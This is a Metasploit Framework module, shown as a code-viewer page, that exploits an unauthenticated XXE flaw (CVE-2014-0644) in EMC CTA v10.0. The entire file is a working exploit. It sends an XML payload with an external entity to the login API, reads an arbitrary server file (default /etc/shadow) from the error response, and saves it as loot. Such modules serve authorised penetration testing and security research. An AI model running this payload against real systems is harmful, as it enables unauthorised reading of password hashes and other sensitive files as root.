Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/gather/emc_cta_xxe.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::HttpClient
8
9
def initialize(info = {})
10
super(
11
update_info(
12
info,
13
'Name' => 'EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read',
14
'Description' => %q{
15
EMC CTA v10.0 is susceptible to an unauthenticated XXE attack
16
that allows an attacker to read arbitrary files from the file system
17
with the permissions of the root user.
18
},
19
'License' => MSF_LICENSE,
20
'Author' => [
21
'Brandon Perry <bperry.volatile[at]gmail.com>', # metasploit module
22
],
23
'References' => [
24
['CVE', '2014-0644'],
25
['EDB', '32623']
26
],
27
'DisclosureDate' => '2014-03-31',
28
'Notes' => {
29
'Reliability' => UNKNOWN_RELIABILITY,
30
'Stability' => UNKNOWN_STABILITY,
31
'SideEffects' => UNKNOWN_SIDE_EFFECTS
32
}
33
)
34
)
35
36
register_options(
37
[
38
Opt::RPORT(443),
39
OptBool.new('SSL', [true, 'Use SSL', true]),
40
OptString.new('TARGETURI', [ true, "Base directory path", '/']),
41
OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/shadow"]),
42
]
43
)
44
end
45
46
def run
47
doctype = Rex::Text.rand_text_alpha(6)
48
element = Rex::Text.rand_text_alpha(6)
49
entity = Rex::Text.rand_text_alpha(6)
50
51
pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
52
<!DOCTYPE #{doctype} [
53
<!ELEMENT #{element} ANY >
54
<!ENTITY #{entity} SYSTEM "file://#{datastore['FILEPATH']}" >]>
55
<Request>
56
<Username>root</Username>
57
<Password>&#{entity};</Password>
58
</Request>
59
}
60
61
res = send_request_cgi({
62
'uri' => normalize_uri(target_uri.path, 'api', 'login'),
63
'method' => 'POST',
64
'data' => pay
65
})
66
67
if !res or !res.body
68
fail_with(Failure::UnexpectedReply, "Server did not respond in an expected way")
69
end
70
71
file = /For input string: "(.*)"/m.match(res.body)
72
73
if !file or file.length < 2
74
fail_with(Failure::UnexpectedReply, "File was unretrievable. Was it a binary file?")
75
end
76
77
file = file[1]
78
79
path = store_loot('emc.file', 'text/plain', datastore['RHOST'], file, datastore['FILEPATH'])
80
81
print_good("File saved to: " + path)
82
end
83
end
84
85